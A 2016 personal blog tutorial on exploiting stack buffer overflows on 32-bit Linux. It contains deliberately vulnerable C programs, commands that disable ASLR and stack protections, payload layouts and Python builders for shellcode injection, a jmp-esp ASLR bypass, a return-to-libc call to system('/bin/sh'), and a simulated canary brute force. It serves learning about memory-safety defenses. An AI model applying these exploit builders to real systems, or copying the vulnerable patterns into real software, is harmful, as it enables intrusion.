Smashing the stack, mainly for fun and no profit

Thursday, July 21st, 2016

The basics

Stack buffer overflows are one of the most common types of security vulnerability. Mudge and Elias Levy/Aleph One published papers 20 years ago about how to exploit them and gain code execution (i.e. redirect program flow to your own code). This is now harder, but the basic problem of lack of memory safety in C and its descendants is still with us. I’ve been learning the basics of writing stack buffer overflow exploits and how to get around some of the modern defenses against them. This is a distillation of my notes to myself, which breaks no new ground, but may as well be on the internet in case it helps someone else.

My writeup here assumes basic familiarity with C, x86 assembly, and gdb. Unfortunately, you’ll definitely need the first two if you want to get started with this kind of exploitation in general. This was all done on Ubuntu 12.04 32-bit with gcc 4.6.3, though it should all be pretty similar on another 32-bit Ubuntu install.

A good place to start for an even simpler demo than Mudge’s paper is this Computerphile video. That will show you the basics of how to use gdb to find what you need to exploit this simple program:

#include <string.h>
#define BUFSIZE 500
int main(int argc, char **argv) {
    char buf[BUFSIZE];
    strcpy(buf, argv[1]);
    return 0;
}

The basic principle is that we are going to overwrite the saved %eip on the stack, so when main() returns, it jumps to the address we want, which will contain the code we want to execute. In this basic formulation, we will write both our shellcode and the address to execute all in one step. We will exploit this program by feeding all this data in as the argument, which strcpy helpfully writes to the stack for us.

In order for this simple technique to work, we need to disable three protections against stack buffer overflows: ASLR, the stack canary, and the non-executable stack. More details follow later, but the main things to do are this:

$ echo 0 | sudo tee /proc/sys/kernel/randomize_va_space
$ gcc buf_overflow.c -o buf_overflow.out -g -z execstack -fno-stack-protector

The first command tells the kernel to disable ASLR when loading programs. When building with gcc, -z execstack tells the linker to mark the stack pages as executable, which they normally aren’t, and -fno-stack-protector omits the canary checking code.

As an aside, you will probably want to enable core dumps so you can examine the state of the process when it crashes if your exploit is not quite right:

$ ulimit -c unlimited

Here’s main()’s stack frame:

0xFFFFFFFF
...
------------------------
| char ** argv         | <-- %ebp + 12
------------------------
| int argc             | <-- %ebp + 8
------------------------
| saved %eip           |
------------------------
| saved %ebp           | <-- %ebp
------------------------
| ...                  |
| buf                  | <-- %ebp - 500 = %esp
------------------------
...
0x08040000

Our exploit will be written into buf, starting at the low address and going up from there. We need to precisely position all our malicious bytes so that the return address exactly lines up with the saved %eip, and that address points to the part of the stack where our shellcode is. The exact location of &buf may not quite be %esp or %ebp - 500; the compiler is free to put other local variables on the stack and arrange things however it likes, and it has to align some variables to 4-byte word boundaries. This is why you have to play around in gdb to examine the stack and find the exact addresses you need.
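Once gdb has given you the two addresses, the distance from the start of buf to the saved %eip is simple arithmetic. Here is a minimal sketch of that calculation; the function name and the two sample addresses are made up for illustration, and it assumes the classic frame drawn above, with the saved %eip 4 bytes above %ebp.

```python
def offset_to_return_address(buf_addr, ebp):
    """Number of bytes from buf[0] to the saved %eip slot.

    Assumes the 32-bit frame layout shown above: the saved %ebp is
    stored at %ebp and the saved %eip is stored at %ebp + 4.
    """
    return (ebp + 4) - buf_addr


# Hypothetical values, as gdb might print them for `p &buf` and `p $ebp`.
buf_addr = 0xBFFFF11C
ebp = 0xBFFFF318

offset = offset_to_return_address(buf_addr, ebp)
print("return address starts %d bytes into the payload" % offset)
```

Everything before that offset is filler, sled, and shellcode; the 4 bytes at that offset are the new return address.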

A basic exploit technique that slightly loosens the requirements for precise addresses is the nop sled. Putting a huge chunk of nop instructions (technically “xchg eax, eax”, opcode 0x90) in front of the shellcode means you can jump anywhere in that region and execution will proceed to the beginning of the actual code. Our exploit will look roughly like this:

--------------------------------------------------------------
| 0x90 x ~475 | ~25b shellcode | new %ebp ptr | new %eip ptr |
--------------------------------------------------------------

Replacing the saved %ebp with a real value may not be necessary, depending on the shellcode you are using. If you are really hardcore, you can write some yourself, but you probably won’t be l337 enough to run execve(“/bin/sh”) in 23 bytes, so you might want to use this one. In this case, you don’t need to set %ebp, but you may need to set %esp, since the shellcode uses that register, and returning from main() may set it to a place you don’t want. Perhaps you can find some other shellcode that doesn’t have this problem, or you can add an instruction to set %esp somewhere safe. In gdb, I found that 0xBFFFF310 was a good spot, since that’s where %esp was set for main().

mov $0xBFFFF310, %esp

This assembles to 0xBC 0x10 0xF3 0xFF 0xBF (remember, x86 is little endian, so don’t get your hex bytes backwards within a word). Again, if you can write assembly, maybe you can do this without hardcoding the address. We do have to hardcode the return address, though. Since we have the %esp address from main() here, we should be able to jump into the middle of the nop sled above there, let’s say 0xBFFFF410. So here is the exploit:

--------------------------------------------------------------------------
| 0x90 x 480 | 0xBC 0xBFFFF310 | 23b shellcode | 0x90909090 | 0xBFFFF410 |
--------------------------------------------------------------------------

You can generate that input with Python, as in the Computerphile video, or write it out in a hex editor. Running it should open a new shell, rather than returning you to the one you came from.
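As a rough sketch of the Python route, the layout above can be assembled like this. The function name is my own, the addresses are the ones from my gdb session and will differ on your machine, and the 23 bytes of 0xCC are only a stand-in for whatever real shellcode you choose.

```python
import struct

NOP = b"\x90"


def build_payload(sled_len, esp_value, shellcode, ret_addr):
    """Assemble: nop sled | mov $imm32,%esp | shellcode | saved %ebp | saved %eip."""
    set_esp = b"\xbc" + struct.pack("<I", esp_value)  # 0xBC = mov $imm32, %esp
    saved_ebp = NOP * 4                               # filler, value is not used
    payload = (NOP * sled_len + set_esp + shellcode
               + saved_ebp + struct.pack("<I", ret_addr))
    # strcpy() stops at the first NUL byte, so the payload must not contain one.
    if b"\x00" in payload:
        raise ValueError("payload contains a NUL byte; strcpy would truncate it")
    return payload


# Placeholder only: 23 int3 bytes standing in for real 23-byte shellcode.
shellcode = b"\xcc" * 23

payload = build_payload(480, 0xBFFFF310, shellcode, 0xBFFFF410)
print(len(payload))
```

struct.pack("<I", ...) takes care of the little endian byte order, so you write addresses the way gdb prints them. To pass the result as argv[1], write the bytes to stdout with sys.stdout.buffer.write() and use shell command substitution.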


A more realistic example

We can use almost the same exploit for a slightly more complicated program:

#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#define BUFSIZE 500
void read_file(int fd, char *buf, size_t bufsize) {
    ssize_t r; // read() returns ssize_t; -1 signals an error
    do {
        r = read(fd, buf, bufsize); // bad: must decrement bufsize
        buf += r;
    } while (r > 0);
}
int main(int argc, char **argv) {
    char buf[BUFSIZE];
    int fd;
    if (argc != 2) {
        printf("Usage: buf_overflow_file filename");
        exit(1);
    }
    fd = open(argv[1], O_RDONLY);
    read_file(fd, buf, BUFSIZE);
    printf("The file says: \n\n%s\n", buf);
    return 0;
}

This program takes a filename argument, reads the file into a buffer, and prints it. But it does the buffer length check incorrectly in read_file(), so we can overflow the buffer in main()’s stack frame, even though the read occurs in a different function. Nothing is substantially different in this version of the exploit, except slightly different addresses and stack placement, since there is an extra stack variable in main()’s frame.

--------------------------------------------------------------------------
| 0x90 x 484 | 0xBC 0xBFFFF110 | 23b shellcode | 0x90909090 | 0xBFFFF200 |
--------------------------------------------------------------------------
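Since this version reads its input from a file, the payload has to end up on disk. A minimal sketch, using the same placeholder shellcode as before, with hypothetical function and file names; the addresses are again specific to my machine.

```python
import os
import struct
import tempfile


def build_file_payload(sled_len, esp_value, shellcode, ret_addr):
    """Same layout as the diagram above, with no NUL-byte restriction."""
    return (b"\x90" * sled_len
            + b"\xbc" + struct.pack("<I", esp_value)  # mov $imm32, %esp
            + shellcode
            + b"\x90" * 4                             # overwrites saved %ebp
            + struct.pack("<I", ret_addr))            # overwrites saved %eip


def write_payload(path, payload):
    # Binary mode matters: text mode could re-encode or translate bytes.
    with open(path, "wb") as f:
        f.write(payload)


shellcode = b"\xcc" * 23  # placeholder for real 23-byte shellcode
payload = build_file_payload(484, 0xBFFFF110, shellcode, 0xBFFFF200)

path = os.path.join(tempfile.mkdtemp(), "exploit.bin")
write_payload(path, payload)
print(path, os.path.getsize(path))
```

Unlike strcpy(), read() does not stop at NUL bytes, so this payload is free to contain them. Pass the printed path as the filename argument.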

Basic defense: ASLR

These simplified techniques don’t actually work on a modern Linux system. Any combination of ASLR, a non-executable stack, and a stack canary would defeat the simple version. In isolation, though, we can still get around some of those protections. First, we re-enable ASLR.

$ echo 2 | sudo tee /proc/sys/kernel/randomize_va_space

If the location of the stack is randomized on each execution, hardcoded stack addresses won’t be any good. Instead, we need to write our shellcode in a place we can get to reliably every time, and somehow transfer execution there. A good place is %esp, since its location is easy to predict. At the time the exploit is written to the stack, %esp points below the write location, but when the vulnerable function returns, %esp will point above that stack frame. Directly above, in fact, immediately next to the return address. So we can rearrange the exploit like this:

-----------------------------------------------------------
| 0x90 x ~500 | 0x90909090 | exploit %eip | 23b shellcode |
-----------------------------------------------------------

Now we know that %esp will point at the shellcode when main() returns, but we need to transfer execution to %esp. So we need to execute:

jmp *%esp

This instruction is encoded as the two bytes 0xFF 0xE4, which a little endian CPU reads as the 16-bit value 0xE4FF. Since we control the compilation of this vulnerable program, we could add a new function:

void jmp_esp() {
    __asm__("jmp *%esp");
}

But that’s not very realistic. This is not an instruction that is likely to occur in a real program. But we don’t actually need "jmp %esp", all we really need is 0xE4FF. This 2-byte value is much more likely to occur in a large executable somewhere, not even necessarily in the .text section. The processor doesn’t care whether 0xE4FF is supposed to mean “jmp %esp” or the decimal number 58623 or any other interpretation of bits — as long as %eip points to some location storing 0xE4FF, the processor will jump to %esp.

So let’s just add this simpler bit of code to our executable:

int jmp_esp = 0xE4FF;

Now that we know this 2-byte sequence will occur in the binary, we can return to its static location and transfer execution to our shellcode. Find the location in the binary:

$ objdump -D buf_overflow_aslr.out | grep 'ff e4'
    8048467: ff e4 jmp *%esp

As far as the disassembler is concerned, that code must be an instruction, which is what we’re going for, even though the value is in the .data section.
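To see why the integer works, here is a small sketch that shows how 0xE4FF is laid out in memory and scans a blob of bytes for that pattern. The blob is synthetic, made up for the example, and find_all is a hypothetical helper, not part of any tool.

```python
import struct

JMP_ESP = b"\xff\xe4"  # encoding of jmp *%esp


def find_all(haystack, needle):
    """Return every offset at which needle occurs in haystack."""
    offsets = []
    start = haystack.find(needle)
    while start != -1:
        offsets.append(start)
        start = haystack.find(needle, start + 1)
    return offsets


# How `int jmp_esp = 0xE4FF;` is stored on a little endian machine.
as_stored = struct.pack("<i", 0xE4FF)

# Synthetic stand-in for a binary: some code bytes, the int, more bytes.
blob = b"\x55\x89\xe5" + as_stored + b"\xc3\xff\xe4"

hits = find_all(blob, JMP_ESP)
print(as_stored, hits)
```

Run against a real executable, this gives file offsets, not virtual addresses. objdump does that mapping for you, which is why I used it above.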

So here’s the new exploit file to bypass ASLR:

---------------------------------------------------------
| 0x90 x ~500 | 0x90909090 | 0x08048467 | 23b shellcode |
---------------------------------------------------------

Don’t forget, the little endian CPU needs to read your 0x8048467 address as 0x67 0x84 0x04 0x08. And as always, you’ll need to tune the size of the (unused) nop sled to properly position the return address and shellcode, depending on exactly how the compiler sets up the stack frame.
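A minimal sketch of building this file in Python follows. The function name is hypothetical, the pad length of 500 is the untuned starting guess from the diagram, and the shellcode is again a 23-byte placeholder.

```python
import struct


def build_jmp_esp_payload(pad_len, jmp_esp_addr, shellcode):
    """Assemble: padding | saved %ebp filler | address of ff e4 | shellcode."""
    return (b"\x90" * pad_len                   # fills buf; never executed
            + b"\x90" * 4                       # overwrites saved %ebp
            + struct.pack("<I", jmp_esp_addr)   # overwrites saved %eip
            + shellcode)                        # %esp points here after ret


shellcode = b"\xcc" * 23  # placeholder for real 23-byte shellcode
payload = build_jmp_esp_payload(500, 0x08048467, shellcode)
print(payload[504:508])
```

The shellcode now sits after the return address rather than before it, so the only value you tune is pad_len.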


Another defense: non-executable stack

This ASLR bypass relies on the stack pages being marked executable by the linker option “-z execstack”. If the executable has been built without that flag, as it should be, you will get a segfault when trying to execute instructions at stack addresses. We can also get around this problem on its own, by executing existing code somewhere else. Functions in the C standard library (libc) are a popular choice, especially if the system() function has been linked into the binary. system() runs its argument in a shell, which lets you run basically anything you want.

We have to make sure the linker includes a reference to this function in our executable:

void never_called() {
    system(NULL);
}

In this example, we do not have ASLR enabled. So, the address of the system() function will be very easy to find.

$ objdump -D buf_overflow_exec.out | grep 'system'
    08048390 <system@plt>:
    80484a8: e8 e3 fe ff ff call 8048390 <system@plt>

We need to return to 0x08048390 to call system(), which is easy enough, but we also need to set things up in the way it expects. Under normal circumstances, when a function is entered, %esp points to the return address (the saved %eip) that the call instruction pushed, and the arguments sit directly above it on the stack. system() takes one argument, a pointer to the command string to run. In our case, we want that to be another shell, i.e. “/bin/sh”. If you are writing this string out in a hex editor, you do not need to reverse anything: byte order only applies to multi-byte integers, and a string is stored one character per byte in increasing address order, i.e. “ABCD” = 0x41 0x42 0x43 0x44.

We control the stack, so we can write this string there, and then we need to give a pointer to that location to system(). Our exploit will look something like this:

---------------------------------------------------------------------------------------
| 0x90 x ~500 | 0x90909090 | 0x08048390 | 0xAAAAAAAA | ptr to next byte | "/bin/sh\0" |
---------------------------------------------------------------------------------------
                                          ^ "%eip"     ^ system() arg     ^ pointee

When system() returns, the program will segfault, unless the page containing 0xAAAAAAAA just happens to be executable, in addition to actually existing. To avoid that, you can put a real address there, but it might still crash since the stack won’t be set up properly.

To find the pointer we need to pass to system(), run the exploit in gdb and see where “/bin/sh” ends up. You can set a breakpoint in main() and examine the stack. Or, you can find %ebp within main() and try to use an address relative to that. Something like:

$ gdb buf_overflow.out
(gdb) break main
(gdb) run some-file
(gdb) p $ebp

If the exploit is structured correctly, the string will be at %ebp + 16 (i.e. %ebp + 0x10). For example, if %ebp within main() is 0xBFFFF318, set the pointer to 0xBFFFF328.

---------------------------------------------------------------------------------
| 0x90 x ~500 | 0x90909090 | 0x08048390 | 0xAAAAAAAA | 0xBFFFF328 | "/bin/sh\0" |
---------------------------------------------------------------------------------

Now you will return to system() and it will call /bin/sh for you.
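Here is a sketch of generating that file, under the same assumptions as the diagram: a hypothetical function name, an untuned pad length of 500, and the %ebp value from my example gdb session.

```python
import struct


def build_ret2libc_payload(pad_len, system_addr, ebp_in_main, command=b"/bin/sh"):
    """Assemble: padding | %ebp filler | system() | fake return | arg ptr | string."""
    string_addr = ebp_in_main + 16  # where the command string lands, per the text
    return (b"\x90" * pad_len
            + b"\x90" * 4                        # overwrites saved %ebp
            + struct.pack("<I", system_addr)     # overwrites saved %eip
            + struct.pack("<I", 0xAAAAAAAA)      # bogus return address for system()
            + struct.pack("<I", string_addr)     # system()'s single argument
            + command + b"\x00")                 # the string itself, NUL-terminated


payload = build_ret2libc_payload(500, 0x08048390, 0xBFFFF318)
print(payload[504:])
```

Only the integers go through struct.pack; the command string is appended byte for byte, in reading order.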


More than the sum of their parts

Unfortunately, the last two exploit techniques can’t easily be combined. My non-executable stack bypass relies on knowing the exact location of some text on the stack, so we can write a static pointer to it. The ASLR bypass relies on writing some code to the stack, which we execute. The procedure linkage table (PLT) is not usually randomized on Linux (it moves only if the executable is built position-independent), so we can still call system() when ASLR is on, but it’s tough to give it the right argument. Perhaps if an executable happened to contain the string “/bin/sh” in a static location, we could pass that location to system() when ASLR is enabled; this seems pretty unlikely.

Therefore, these two defenses are reasonably effective in combination against this simple kind of attack. There are other attacks against ASLR, though, and more sophisticated return-oriented-programming (ROP) can still get around the non-executable stack. These bypass techniques are further than I’ve gone so far, but apparently they are pretty useful.

I have not yet gotten into heap buffer overflows, but that’s another class of bug that is apparently popular to exploit now. Regarding ROP and ASLR, I recently met David Williams-King, who is working on a new type of ASLR that uses a table of pointers that is constantly moved around, every few milliseconds, rather than simply randomizing the entire address space once. Perhaps this academic research will eventually find its way into the wild and make ROP even harder.


A bigger show stopper: the stack canary

An especially effective defense that I have so far avoided is the stack canary, stack cookie, or as gcc calls it, the stack-smashing protector (SSP). The canary is a random value written on the stack between any buffers and the saved pointers. When the function returns, it checks the canary location against the known value, and if it doesn’t match, this suggests that the return address has been smashed, so it quits. With the canary enabled, our stack frame would look like this:

0xFFFFFFFF
...
------------------------
| char ** argv         | <-- %ebp + 12
------------------------
| int argc             | <-- %ebp + 8
------------------------
| saved %eip           |
------------------------
| saved %ebp           | <-- %ebp
------------------------
| 4 random bytes       | <-- canary
------------------------
| ...                  |
| buf                  | <-- %ebp - 500 = %esp
------------------------
...
0x08040000
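A toy model of this frame in Python shows why the earlier payloads no longer work. This is only a sketch: it ignores alignment padding, uses a fixed stand-in canary instead of a random one, and all the names are made up.

```python
BUF_SIZE = 500
CANARY = bytes.fromhex("00a1b2c3")  # stand-in; the real value is random per process


def make_frame():
    """Frame from low to high address: buf | canary | saved %ebp | saved %eip."""
    return bytearray(BUF_SIZE) + CANARY + b"EBP." + b"EIP."


def unchecked_copy(frame, data):
    """Model a copy with no bounds check, writing from buf[0] upward."""
    data = data[:len(frame)]  # the model simply ends at the top of the frame
    frame[:len(data)] = data


def canary_intact(frame):
    """The check the function epilogue performs before returning."""
    return bytes(frame[BUF_SIZE:BUF_SIZE + 4]) == CANARY


safe = make_frame()
unchecked_copy(safe, b"A" * BUF_SIZE)  # fits exactly in buf

smashed = make_frame()
unchecked_copy(smashed, b"\x90" * 508 + bytes.fromhex("10f4ffbf"))

print(canary_intact(safe), canary_intact(smashed))
```

The write that reaches the saved %eip has to pass through the canary first, so the return address can only be changed at the cost of failing the check.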

The canary-handling code is generated by the compiler, if you use the flag -fstack-protector, which Ubuntu’s gcc enables by default. If you disassemble main(), you’ll see the code that writes and then checks the canary:

0x080484fb <+0>: push %ebp
0x080484fc <+1>: mov %esp,%ebp
0x080484fe <+3>: and $0xfffffff0,%esp
0x08048501 <+6>: sub $0x220,%esp
0x08048507 <+12>: mov 0xc(%ebp),%eax
0x0804850a <+15>: mov %eax,0x1c(%esp)
0x0804850e <+19>: mov %gs:0x14,%eax
0x08048514 <+25>: mov %eax,0x21c(%esp)
0x0804851b <+32>: xor %eax,%eax
0x0804851d <+34>: cmpl $0x2,0x8(%ebp)
0x08048521 <+38>: je 0x804853c <main+65>
0x08048523 <+40>: mov $0x8048684,%eax
0x08048528 <+45>: mov %eax,(%esp)
0x0804852b <+48>: call 0x80483b0 <printf@plt>
0x08048530 <+53>: movl $0x1,(%esp)
0x08048537 <+60>: call 0x80483e0 <exit@plt>
0x0804853c <+65>: mov 0x1c(%esp),%eax
0x08048540 <+69>: add $0x4,%eax
0x08048543 <+72>: mov (%eax),%eax
0x08048545 <+74>: movl $0x0,0x4(%esp)
0x0804854d <+82>: mov %eax,(%esp)
0x08048550 <+85>: call 0x80483f0 <open@plt>
0x08048555 <+90>: mov %eax,0x24(%esp)
0x08048559 <+94>: movl $0x1f4,0x8(%esp)
0x08048561 <+102>: lea 0x28(%esp),%eax
0x08048565 <+106>: mov %eax,0x4(%esp)
0x08048569 <+110>: mov 0x24(%esp),%eax
0x0804856d <+114>: mov %eax,(%esp)
0x08048570 <+117>: call 0x80484cb
0x08048575 <+122>: mov $0x80486a6,%eax
0x0804857a <+127>: lea 0x28(%esp),%edx
0x0804857e <+131>: mov %edx,0x4(%esp)
0x08048582 <+135>: mov %eax,(%esp)
0x08048585 <+138>: call 0x80483b0 <printf@plt>
0x0804858a <+143>: mov $0x0,%eax
0x0804858f <+148>: mov 0x21c(%esp),%edx
0x08048596 <+155>: xor %gs:0x14,%edx
0x0804859d <+162>: je 0x80485a4 <main+169>
0x0804859f <+164>: call 0x80483c0 <__stack_chk_fail@plt>
0x080485a4 <+169>: leave
0x080485a5 <+170>: ret

So the canary value comes from gs:0x14, which is the struct pthread thread descriptor (info, code). Once generated, it is a static value, so what we need to do is copy it from gs:0x14 back to %esp + 0x21C after smashing the original value. But copying that value requires code execution, which we are trying to achieve. We’re stuck.

Previous versions of canary bypass have targeted locations besides the saved %eip, like other local pointers that happened to be above the buffer, or the function’s arguments. But the current SSP is smart enough to reorganize the stack frame such that all the buffers are near the top, all the locals are below them, and arguments are copied below the buffers before using them. Thanks IBM!

On Windows, the stack canary works via SEH, so if you can overwrite the exception handler, you might be able to get control that way (or you can cause an exception before the canary is checked, if you control the SEH record). A good resource on Windows defenses and bypasses is at Corelan.be.

Canary checking is more straightforward with Linux/gcc, though, so we don’t have an easy workaround. For a trickier attack, consider that the value is not reset if the process fork()s, as a server might do without calling exec(), so this might give you a chance to guess the same value repeatedly. On a 32-bit system, the value is brute forceable this way, but not every process fork()s, and few servers would still be 32-bit these days. This paper proposes a defense against the forking attack.
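One common way to make the forking attack practical, which I have not tried myself, is to guess the canary one byte at a time: overflow just far enough to overwrite a single canary byte and watch whether the child crashes. The sketch below simulates that against a fake oracle. Nothing here talks to a real process, and the names and the secret value are made up.

```python
def make_oracle(secret):
    """Simulate a forking server whose children all share one canary."""
    def child_survives(guess_prefix):
        # The overflow replaces the first len(guess_prefix) canary bytes;
        # the child passes the check only if those bytes are unchanged.
        return secret[:len(guess_prefix)] == guess_prefix
    return child_survives


def brute_force_canary(child_survives, size=4):
    """Recover the canary byte by byte; returns (canary, attempts)."""
    known = b""
    attempts = 0
    for _ in range(size):
        for candidate in range(256):
            attempts += 1
            if child_survives(known + bytes([candidate])):
                known += bytes([candidate])
                break
        else:
            raise RuntimeError("no byte value survived; the canary may have changed")
    return known, attempts


secret = bytes.fromhex("00a1b2c3")  # stand-in for the value the parent forked with
recovered, attempts = brute_force_canary(make_oracle(secret))
print(recovered.hex(), attempts)
```

Guessing this way takes at most 4 x 256 = 1024 attempts for a 4-byte canary, compared with up to 2^32 for guessing all four bytes at once.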

There is still some remote chance of corrupted data if there are multiple buffers in the stack frame, and the higher one stores pointers or some other exploitable data, and the lower one can overflow into it. You may be able to make other parts of the program misbehave by manipulating this data. But that’s not the case in our simple example. You might find this more useful in C++ objects, which contain function pointers, and may be on the stack! To dig deeper here, heap overflows and use-after-free bugs on the heap generally target C++ objects and their function pointers, but this is a whole other topic.

I heard a talk by Mudge at Summercon this weekend where he stressed that “we have to get beyond controlling the instruction pointer”; that is, a lot of critical systems can be disrupted without executing your own code. Think of industrial systems or infrastructure: you don’t need to run malware on the power grid, you just need to crash the program to turn the lights off. His example was an oil drilling rig: if the drill stops, the molten earth solidifies around it, knocking it offline for at least a year. Defense systems are another example where denial-of-service is nearly as bad as code execution (which can, itself, of course cause DoS). The stack canary is no use in these cases; the buffer overflow still happens and causes the program to crash.

In the case of your PC or server, though, where crashing is not that terrible, the stack canary is a pretty good defense. I haven’t read of any techniques to reliably rewrite the canary value in all cases, i.e. cases where you can’t fork(). If that changes, I’ll update this.


Putting it all together

Here are some good walkthroughs on how to bypass these defenses in practice, in a situation where it is in fact possible (e.g. server process that calls fork(), and the ability to call usleep() to learn the base address of libc).
